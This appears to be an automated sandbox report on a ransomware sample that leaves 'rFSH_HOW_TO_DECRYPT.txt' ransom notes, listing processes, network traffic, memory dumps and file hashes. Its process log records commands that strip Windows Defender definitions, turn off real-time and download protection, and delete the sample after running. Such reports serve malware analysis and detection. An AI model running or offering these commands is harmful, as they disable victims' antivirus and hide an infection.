C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\rFSH_HOW_TO_DECRYPT.txt
C:\Windows\SYSTEM32\notepad.exe
notepad.exe C:\rFSH_HOW_TO_DECRYPT.txt
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.bin.sample.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 52.109.8.21:443 | tcp | |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 40.119.148.38:123 | time.windows.com | udp |
Files
memory/1152-115-0x0000000000000000-mapping.dmp
memory/3972-116-0x0000000000000000-mapping.dmp
memory/1964-117-0x0000000000000000-mapping.dmp
memory/4072-118-0x0000000000000000-mapping.dmp
memory/2808-119-0x0000000000000000-mapping.dmp
memory/1196-120-0x0000000000000000-mapping.dmp
memory/1216-121-0x0000000000000000-mapping.dmp
memory/3960-122-0x0000000000000000-mapping.dmp
memory/1868-123-0x0000000000000000-mapping.dmp
memory/1384-124-0x0000000000000000-mapping.dmp
memory/2152-125-0x0000000000000000-mapping.dmp
memory/3012-126-0x0000000000000000-mapping.dmp
memory/4044-127-0x0000000000000000-mapping.dmp
memory/2312-128-0x0000000000000000-mapping.dmp
memory/388-129-0x0000000000000000-mapping.dmp
memory/924-130-0x0000000000000000-mapping.dmp
memory/740-131-0x0000000000000000-mapping.dmp
memory/1268-132-0x0000000000000000-mapping.dmp
memory/860-133-0x0000000000000000-mapping.dmp
memory/1080-134-0x0000000000000000-mapping.dmp
memory/1344-135-0x0000000000000000-mapping.dmp
memory/1340-136-0x0000000000000000-mapping.dmp
memory/2092-137-0x0000000000000000-mapping.dmp
memory/1680-138-0x0000000000000000-mapping.dmp
memory/1968-139-0x0000000000000000-mapping.dmp
memory/2192-140-0x0000000000000000-mapping.dmp
memory/3048-141-0x0000000000000000-mapping.dmp
memory/3636-142-0x0000000000000000-mapping.dmp
memory/3068-143-0x0000000000000000-mapping.dmp
memory/2064-144-0x0000000000000000-mapping.dmp
memory/1972-145-0x0000000000000000-mapping.dmp
memory/2680-146-0x0000000000000000-mapping.dmp
memory/2540-147-0x0000000000000000-mapping.dmp
memory/3648-148-0x0000000000000000-mapping.dmp
memory/3228-149-0x0000000000000000-mapping.dmp
memory/3580-150-0x0000000000000000-mapping.dmp
memory/3884-151-0x0000000000000000-mapping.dmp
memory/2504-152-0x0000000000000000-mapping.dmp
memory/3996-153-0x0000000000000000-mapping.dmp
memory/3564-154-0x0000000000000000-mapping.dmp
memory/2776-155-0x0000000000000000-mapping.dmp
memory/3600-156-0x0000000000000000-mapping.dmp
memory/3484-157-0x0000000000000000-mapping.dmp
memory/2156-158-0x0000000000000000-mapping.dmp
memory/3360-159-0x0000000000000000-mapping.dmp
memory/3708-160-0x0000000000000000-mapping.dmp
memory/2912-161-0x0000000000000000-mapping.dmp
memory/988-162-0x0000000000000000-mapping.dmp
memory/4088-163-0x0000000000000000-mapping.dmp
memory/1088-164-0x0000000000000000-mapping.dmp
memory/3308-165-0x0000000000000000-mapping.dmp
memory/1496-166-0x0000000000000000-mapping.dmp
memory/1756-167-0x0000000000000000-mapping.dmp
memory/1920-168-0x0000000000000000-mapping.dmp
memory/620-169-0x0000000000000000-mapping.dmp
memory/376-170-0x0000000000000000-mapping.dmp
memory/2648-171-0x0000000000000000-mapping.dmp
memory/792-172-0x0000000000000000-mapping.dmp
memory/1048-173-0x0000000000000000-mapping.dmp
memory/3096-174-0x0000000000000000-mapping.dmp
memory/3664-175-0x0000000000000000-mapping.dmp
memory/3064-176-0x0000000000000000-mapping.dmp
memory/3936-177-0x0000000000000000-mapping.dmp
memory/3944-178-0x0000000000000000-mapping.dmp
memory/1424-180-0x00000244C63F0000-0x00000244C63F2000-memory.dmp
memory/1424-179-0x00000244C63F0000-0x00000244C63F2000-memory.dmp
memory/1424-181-0x00000244C63F0000-0x00000244C63F2000-memory.dmp
memory/1424-182-0x00000244C63F0000-0x00000244C63F2000-memory.dmp
memory/1424-183-0x00000244C63F0000-0x00000244C63F2000-memory.dmp
memory/1424-184-0x00000244E0B00000-0x00000244E0B22000-memory.dmp
memory/1424-185-0x00000244C63F0000-0x00000244C63F2000-memory.dmp
memory/1424-187-0x00000244C63F0000-0x00000244C63F2000-memory.dmp
memory/1424-186-0x00000244C63F0000-0x00000244C63F2000-memory.dmp
memory/1424-188-0x00000244E0CB0000-0x00000244E0D26000-memory.dmp
memory/1424-189-0x00000244C63F0000-0x00000244C63F2000-memory.dmp
memory/1424-193-0x00000244DE9B0000-0x00000244DE9B2000-memory.dmp
memory/1424-194-0x00000244DE9B3000-0x00000244DE9B5000-memory.dmp
memory/1424-195-0x00000244DE9B6000-0x00000244DE9B8000-memory.dmp
memory/1424-196-0x00000244C63F0000-0x00000244C63F2000-memory.dmp
memory/1424-197-0x00000244C63F0000-0x00000244C63F2000-memory.dmp
memory/1424-217-0x00000244C63F0000-0x00000244C63F2000-memory.dmp
memory/1424-218-0x00000244C63F0000-0x00000244C63F2000-memory.dmp
memory/3784-222-0x0000020649D90000-0x0000020649D92000-memory.dmp
memory/1424-221-0x00000244DE9B8000-0x00000244DE9B9000-memory.dmp
memory/3784-220-0x0000020649D90000-0x0000020649D92000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
memory/3784-223-0x0000020649D90000-0x0000020649D92000-memory.dmp
memory/3784-224-0x0000020649D90000-0x0000020649D92000-memory.dmp
memory/3784-225-0x0000020649D90000-0x0000020649D92000-memory.dmp
memory/3784-226-0x0000020665C80000-0x0000020665CA2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c1a9d60c2e12f184bc957bde395d9714 |
| SHA1 | 36a90d4e8d80cb494820c315ad209ce0453d2c95 |
| SHA256 | c450f7df47f32bba121d1f3b205bcbc28fe82828c74fdb4a0de3de3eaf73a882 |
| SHA512 | 9096ca09ae78e4c52a0387e2df2523356b95bc081364f0940a247459aa1904964756b53c8420f33da9877b9271395b1a1a55822ca2e2ad6697869825570485ec |
memory/3784-228-0x0000020649D90000-0x0000020649D92000-memory.dmp
memory/3784-229-0x0000020649D90000-0x0000020649D92000-memory.dmp
memory/3784-230-0x0000020649D90000-0x0000020649D92000-memory.dmp
memory/3784-231-0x0000020649D90000-0x0000020649D92000-memory.dmp
memory/3784-232-0x0000020665E30000-0x0000020665EA6000-memory.dmp
memory/3784-233-0x0000020649D90000-0x0000020649D92000-memory.dmp
memory/3784-257-0x0000020663CA0000-0x0000020663CA2000-memory.dmp
memory/3784-258-0x0000020663CA3000-0x0000020663CA5000-memory.dmp
memory/3784-259-0x0000020663CA6000-0x0000020663CA8000-memory.dmp
memory/3784-262-0x0000020663CA8000-0x0000020663CA9000-memory.dmp
C:\Users\Admin\Desktop\rFSH_HOW_TO_DECRYPT.txt
| MD5 | 9feb836dd50f68cbf9e87dad21a2fbc4 |
| SHA1 | f995609d7ea8a22383c8f28e2ac9b657fa767019 |
| SHA256 | 773b3349fdbb3a90decde363815564f1eb0be1549650ec3cfd3f785f27e3d88e |
| SHA512 | 123db92c2616a2f913c91c6811cf8a375b69b3d71d40ab2633ca298cfda0aa863a3a3f106096f01cbfa01b7f0e56693babf04b1f7f0d7e90b405c9cf54147748 |
C:\rFSH_HOW_TO_DECRYPT.txt
| MD5 | 9feb836dd50f68cbf9e87dad21a2fbc4 |
| SHA1 | f995609d7ea8a22383c8f28e2ac9b657fa767019 |
| SHA256 | 773b3349fdbb3a90decde363815564f1eb0be1549650ec3cfd3f785f27e3d88e |
| SHA512 | 123db92c2616a2f913c91c6811cf8a375b69b3d71d40ab2633ca298cfda0aa863a3a3f106096f01cbfa01b7f0e56693babf04b1f7f0d7e90b405c9cf54147748 |